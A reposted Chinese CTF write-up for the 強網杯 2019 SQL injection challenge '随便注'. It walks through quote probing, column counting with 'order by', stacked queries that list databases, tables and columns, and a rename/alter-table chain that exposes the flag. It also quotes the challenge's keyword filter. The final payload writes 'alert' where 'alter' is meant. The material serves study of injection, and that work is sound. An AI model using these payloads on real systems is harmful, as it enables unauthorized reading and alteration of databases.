首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2025-12-05 19:04:27
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
迷你世界最值得入手五大皮膚
迷你世界最值得入手五大皮膚
提起迷你世界裡的各種皮膚,相信玩家内心都非常激動,這裡面的每一款皮膚都是經過認真設計的,不但外觀好看,而且特效也非常好。幾乎每次迷你世界上新皮膚的時候,都會得到玩家們的不斷稱贊。另外迷你世界裡皮膚的種類也相當多,估計玩家看了後都感到眼花缭亂...
2025-12-05
會計含金量高的證書排行
會計含金量高的證書排行
一本含金量高的資格證書,不僅能給求職者提供更好的機遇,而且持證人普遍薪資待遇很好。而大多數小夥伴精力有限,隻能考取一本。那麼問題來了,哪些會計證書值得考取呢?一起和小信來看看吧。基礎配置初級會計職稱會計人入行的最基礎的必備證書。作為新會計證...
2025-12-05
典盡客衣三尺雪煉精詩句一頭霜下一句
典盡客衣三尺雪煉精詩句一頭霜下一句
典盡客衣三尺雪煉精詩句一頭霜下一句?典盡客衣三尺雪,煉精詩句一頭霜下一句:故人多在芙蓉幕,應笑孜孜道未光,下面我們就來說一說關于典盡客衣三尺雪煉精詩句一頭霜下一句?我們一起去了解并探讨一下這個問題吧!典盡客衣三尺雪煉精詩句一頭霜下一句典盡客...
2025-12-05
圖片轉換成word在線
圖片轉換成word在線
圖片轉換成word在線?有時我們去參加一些培訓或活動,現場筆記來不及做都是先用手機拍照,後續再整理的時候重新打肯定特别耗時間,是否能直接将照片識别成文字呢?,我來為大家講解一下關于圖片轉換成word在線?跟着小編一起來看一看吧!圖片轉換成w...
2025-12-05
扇子的寓意和象征
扇子的寓意和象征
扇子的寓意和象征?因“扇°與善諧音,扇子也寓意善良、“善行,是作為禮品贈送友的最佳物品手執一扇,求的是自我本心,念念向善這世上本沒有信仰,若人人向善,人人皆為信仰,下面我們就來聊聊關于扇子的寓意和象征?接下來我們就一起去了解一下吧!扇子的寓...
2025-12-05
Copyright 2023-2025 - www.tftnews.com All Rights Reserved